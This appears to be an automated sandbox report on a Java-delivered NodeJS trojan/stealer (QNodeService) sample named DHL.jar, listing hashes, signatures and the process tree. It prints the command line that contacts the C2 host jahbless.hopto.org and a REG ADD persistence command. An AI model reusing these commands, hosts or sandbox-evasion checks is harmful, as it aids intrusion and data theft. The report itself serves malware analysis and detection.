Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
128s -
platform
windows10_x64 -
resource
win10 -
submitted
12/10/2020, 06:16
Static task
static1
Behavioral task
behavioral1
Sample
DHL.jar
Resource
win7v200722
Behavioral task
behavioral2
Sample
DHL.jar
Resource
win10
General
-
Target
DHL.jar
-
Size
318KB
-
MD5
ba3c3a491c1f542ba70b5cba78664c27
-
SHA1
e3f3836cbd6c20799d5fd847852732ec6bbb64a6
-
SHA256
f104ffa104dc5c0739ed98c605c0cc32fc148aa40dab5de2916d9b1f864a4654
-
SHA512
7d0201320644db94497f6e1d0584a2be985210c205ae63a3ba4aaa7831d778aa5893e608ed96c082e31f4e63173ff626043cf90af93a2a747710366fa6745b50
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3848 node.exe 2172 node.exe 968 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\4150b6ef-79e8-4958-a0e7-711c10eeb34d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad91-167.dat js behavioral2/files/0x000100000001ad91-172.dat js behavioral2/files/0x000100000001ad91-176.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 wtfismyip.com 19 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3848 node.exe 3848 node.exe 3848 node.exe 3848 node.exe 2172 node.exe 2172 node.exe 2172 node.exe 2172 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe 968 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3700 wrote to memory of 1744 3700 java.exe 74 PID 3700 wrote to memory of 1744 3700 java.exe 74 PID 1744 wrote to memory of 3848 1744 javaw.exe 78 PID 1744 wrote to memory of 3848 1744 javaw.exe 78 PID 3848 wrote to memory of 2172 3848 node.exe 80 PID 3848 wrote to memory of 2172 3848 node.exe 80 PID 2172 wrote to memory of 968 2172 node.exe 81 PID 2172 wrote to memory of 968 2172 node.exe 81 PID 968 wrote to memory of 2972 968 node.exe 83 PID 968 wrote to memory of 2972 968 node.exe 83 PID 2972 wrote to memory of 1196 2972 cmd.exe 84 PID 2972 wrote to memory of 1196 2972 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain jahbless.hopto.org --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1196
-
-
-
-
-
-